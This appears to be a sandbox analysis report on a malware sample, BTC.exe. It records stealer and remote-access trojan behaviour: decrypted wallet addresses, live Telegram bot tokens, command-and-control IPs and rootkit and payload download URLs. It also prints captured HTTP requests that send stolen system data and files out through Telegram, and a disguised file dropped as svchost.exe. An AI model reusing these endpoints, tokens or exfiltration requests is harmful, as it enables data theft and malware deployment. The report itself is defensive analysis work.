                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: USB.exe
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: %AppData%
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: Windows Defender Service Host.exe
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: bc1qqe5ggjpyw4gyw79vqysj8x6w3jpx20ad5lj2zl
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: 0x18313842dfF02262dCb1FeCa9E908174be47AE8d
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: TT95VUx37LfK4FFesVShkzpKS5LK9udS2p
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: 7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: 6291749148
                            Source: BTC.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknown | HTTPS traffic detected: 145.14.144.231:443 -> 192.168.2.5:49721 version: TLS 1.0
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2
                            Source: BTC.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: winload_prod.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: winload_prod.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr

                            Networking

                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49719 -> 146.190.29.250:7812
                            Source: Network trafficSuricata IDS: 2036383 - Severity 1 - ET MALWARE Common RAT Connectivity Check Observed : 192.168.2.5:49706 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2036383 - Severity 1 - ET MALWARE Common RAT Connectivity Check Observed : 192.168.2.5:49707 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.5:49728 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2049872 - Severity 1 - ET MALWARE Rezlt RDP Grabber - This is Not RDP : 192.168.2.5:49705 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.5:49729 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.5:49728 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.5:49729 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2045614 - Severity 1 - ET MALWARE MSIL/Spyware Activity via Telegram (Response) : 149.154.167.220:443 -> 192.168.2.5:49705
                            Source: Network trafficSuricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.5:49734 -> 149.154.167.220:443
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.16.185.241 80Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.196.114 443Jump to behavior
                            Source: Malware configuration extractorURLs: 146.190.29.250
                            Source: Malware configuration extractorURLs: 146.190.29.250
                            Source: Malware configuration extractorURLs: 165.227.91.90
                            Source: Malware configuration extractorURLs: 167.99.94.206
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: unknownDNS query: name: api.telegram.org
                            Source: Yara matchFile source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49709 -> 165.227.91.90:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49710 -> 146.190.29.250:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49711 -> 185.252.232.158:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49713 -> 64.23.232.116:7812
                            Source: global trafficTCP traffic: 192.168.2.5:49737 -> 167.99.94.206:7812
                            Source: global trafficHTTP traffic detected: GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /r77-x64.dll HTTP/1.1Host: payloads-poison.000webhostapp.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                            Source: global trafficHTTP traffic detected: POST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="f2e02031-2c41-4dad-a28a-f3bbaaed3e95"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: 91.134.207.16Connection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 104.16.185.241
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: TUT-ASUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: icanhazip.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 149.154.167.220:443
                            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
                            Source: unknownHTTPS traffic detected: 145.14.144.231:443 -> 192.168.2.5:49721 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 165.227.91.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.190.29.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.252.232.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 64.23.232.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.134.207.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.99.94.206
                            Source: global trafficHTTP traffic detected: GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /r77-x64.dll HTTP/1.1Host: payloads-poison.000webhostapp.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: payloads-poison.000webhostapp.com
                            Source: global trafficDNS traffic detected: DNS query: 201.75.14.0.in-addr.arpa
                            Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                            Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                            Source: unknownHTTP traffic detected: POST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"Host: api.telegram.orgContent-Length: 160724Expect: 100-continue
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 04:16:35 GMTContent-Type: text/htmlContent-Length: 20319Connection: closeETag: "65dc8956-4f5f"Server: awexX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Request-ID: a049bd78bd228879c6cc6d046cfde157
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://127.0.0.1:4040/api/tunnels
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.207.16
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/Install.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/WinSCP.com
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/WinSCP.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/autoupdate1.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/autoupdate2.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/getrdp.exe
                            Source: Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/ngrok.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/ngrok.exe=set
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/rdpinstall.exe
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/svchost.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://91.134.207.16/update.exe
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://api.ipify.org/
                            Source: update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.org
                            Source: update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.mylnikov.orgd
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                            Source: powershell.exe, 00000011.00000002.2371162192.0000000006D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miu
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://freegeoip.net/xml/
                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/t
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comd
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://ip-api.com/json/
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://payloads-poison.000webhostapp.com
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
